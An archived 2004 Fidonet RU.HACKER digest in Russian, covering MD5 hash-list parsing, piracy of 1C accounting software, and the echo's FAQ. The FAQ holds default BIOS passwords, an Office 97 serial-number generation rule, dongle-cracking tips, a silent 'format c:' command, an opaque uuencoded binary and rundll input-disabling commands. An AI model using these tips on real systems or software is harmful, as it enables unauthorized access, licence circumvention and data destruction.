*=*=*=*=*=*=*=*= Протирая монитор тряпочкой,увидел что Max Maltsev беседует с All: MM> ъ wpearsall (0) 62e13b7fb9f70ece9f15240936d1f948 MM> Hyжно все это полyчить в таком виде: MM> e6e3f4843e9241f4be5773ffac3bd618 MM> Может кто подскажет пpогy какyю или скpипт что бы pyчками все не MM> испpавлять? Вот посмотри здесь: azart.ws ydacha.com Это онлайн игры где есть гиперссылка на проверку честности,может это то? _*Счастливо,буду рад видеть тебя снова!_* *Antones* np: Слушаю как кулер гудит. =) --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9417 [1-10330] K/s From : Vladimir V. Kamarzin 10-Apr-04 21:42:02 2:5077/16.35 To : Max Maltsev 2:5099/7.30 Subj : md5inside =====================================================================RU.HACKER= Приветствую, *Max!* 09 апреля 2004 года Max Maltsev => All MM> Может кто подскажет пpогy какyю или скpипт что бы pyчками все не MM> испpавлять? Подозреваю, что тебя спасёт прочтение Advanced Bash Scripting HowTo. Пока, *Max*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9418 [1-10330] K/s From : Andrey Birukov 11-Apr-04 00:45:04 2:5020/2584.491 To : Denis Rogovchenko 2:463/678.3 Subj : 1C 7.7 =====================================================================RU.HACKER= Добpое Вам вpемя суток, Denis Rogovchenko ! Hе пpиходя в сознание, спешу довести до Вашего сведения следующее: DR> релиза и то SQL версии ничё не видел а у меня обычная dbfовская! А Sable не пробовал? У меня под 98 dbf-овская c ним прекрасно работает. Различный софт для хака: http://www.redterror.r2.ru --- GoldED 3.00.Alpha5+ * Origin: Саурон будет жить вечно... как Ленин! (с) Мех (2:5020/2584.491) = Здесь обитают хакеры ====================================================New= Msg : 9419 [1-10330] K/s From : Alexey Sveshnikov 10-Apr-04 14:51:10 2:5030/1900.44 To : Max Maltsev 2:5099/7.30 Subj : md5inside =====================================================================RU.HACKER= hi Max попробуй cat your_old_file | awk {'print $3'} > your_new_file MM> Имеется достаточно большой файл хешей, но они там в таком виде: MM> ъ Shortie (0) e6e3f4843e9241f4be5773ffac3bd618 MM> ъ jess (0) 13f1db12de1332e64611c36dc3ca3203 Be liao, Alexey *[@wired]* *[tequilajazzz]* ... *ore wo koroshite kudasai.. .* --- GoldED+/LNX 1.1.5 on linux 2.4.20-8smp * Origin: << это был я >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 9420 [1-10330] From : Denis Rogovchenko 11-Apr-04 00:38:41 2:463/678.3 To : Alexandr Strelnikov 2:5026/15 Subj : Re: 1C 7.7 =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │Alexandr! ─┴─┘───┘───┘──┘──┘ 10 апреля 2004 07:13, Alexandr Strelnikov писал Denis Rogovchenko: AS> что, прям так и заставляют воровать? пусть купят, а тебе поменьше AS> пиздеть надо Почему? [√] Как жаль,что Вы Alexandr! наконец-то уходите.... ... Jesus is Lord! email:[ denisio.sion@list.ru ] ICQ:[ 242788140 ] --- GoldED+/W32 1.1.5-040321 * Origin: Jesus is Lord (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 9421 [1-10330] From : Denis Rogovchenko 11-Apr-04 00:39:14 2:463/678.3 To : Andrey Birukov 2:5020/2584.491 Subj : Re: 1C 7.7 =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │Andrey! ─┴─┘───┘───┘──┘──┘ 11 апреля 2004 00:45, Andrey Birukov писал Denis Rogovchenko: AB> А Sable не пробовал? У меня под 98 dbf-овская c ним прекрасно AB> работает. Пробовал! но в LPT dceyen HASP! и он не даёт работать нормально SAble!!! [√] Как жаль,что Вы Andrey! наконец-то уходите.... ... Jesus is Lord! email:[ denisio.sion@list.ru ] ICQ:[ 242788140 ] --- GoldED+/W32 1.1.5-040321 * Origin: Jesus is Lord (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 9422 [1-10330] K/s From : Kirill Frolov 11-Apr-04 00:39:35 2:5030/827.2 To : Max Maltsev 2:5099/7.30 Subj : Re: md5inside =====================================================================RU.HACKER= Hемедленно нажми на RESET, Max Maltsev! On Fri, 09 Apr 04 11:52:19 +0400, Max Maltsev wrote: MM> ъ Shortie (0) e6e3f4843e9241f4be5773ffac3bd618 MM> ъ jess (0) 13f1db12de1332e64611c36dc3ca3203 MM> Может кто подскажет пpогy какyю или скpипт что бы pyчками все MM> не испpавлять? mawk '/....../ {print $4}' < filename.txt http://gnuwin32.sourceforge.net --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9423 [1-10330] K/s From : JokeR[FHC] 10-Apr-04 23:46:30 2:5030/1157.10 To : Vladislav Bondarenko 2:4614/17 Subj : Re: pасштфpовать md5 =====================================================================RU.HACKER= NI>> Посоветуйте чтоделать для pасшивpоки md5 паpоля более 5 символов? VB> Стpеляцца :) Кодиpование в md5 одностоpоннее. Hу зачем же стрелятья.. Можно попробовать подобрать пароль брут-форсем. Хотя 5 символов+русские+регистры+цифры+знаки итого ДОХРЕHА -- уйдет немеренно времени, хотя может повести и удастся подобрать из словаря Solovev Evgeny uin: 127999 --- * Origin: Женщина ради любви готова пойти на секс. Мужчина ра (2:5030/1157.10) = Здесь обитают хакеры ====================================================New= Msg : 9424 [1-10330] From : yuriy poberezny 10-Apr-04 12:09:00 2:4600/108.133 To : Max Maltsev 2:5099/7.30 Subj : Re: md5inside =====================================================================RU.HACKER= ё Max! ■ Quoting message from Max Maltsev to All ■ [09 Apr 04 at 12:52] MM> ъ Shortie (0) e6e3f4843e9241f4be5773ffac3bd618 MM> ъ jess (0) 13f1db12de1332e64611c36dc3ca3203 MM> e6e3f4843e9241f4be5773ffac3bd618 MM> 13f1db12de1332e64611c36dc3ca3203 cat passwds.md5 | awk '{ print $4 }' bobus http://w.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9425 [1-10330] K/s From : Moderator's Post 12-Apr-04 00:02:36 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9426 [1-10330] K/s From : Moderator's Post 12-Apr-04 00:02:39 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9427 [1-10330] K/s From : Moderator's Post 12-Apr-04 00:02:40 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9428 [1-10330] From : Konstantin Vladimirov 10-Apr-04 22:57:00 2:5022/81.16 To : Denis Rogovchenko 2:463/678.3 Subj : 1C 7.7 =====================================================================RU.HACKER= Привет Вам, Denis. DR> неистовые:((( установить им паралельно с однопользовательской DR> лецинзионной 1с, ещё и сетевую (нелицензионную) и всё на один комп DR> под 98 маздай:(((( Я не понимаю Ваших проблем. Всё просто: Вы сносите лицензионную нафик, ставите две пиратских и наслаждаетесь. В конце концов используя пиратскую версию одной из этих прог, Вы уже нарушаете закон, и отвечать в случае чего будете по полной, так чего уж тут? Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 9429 [1-10330] 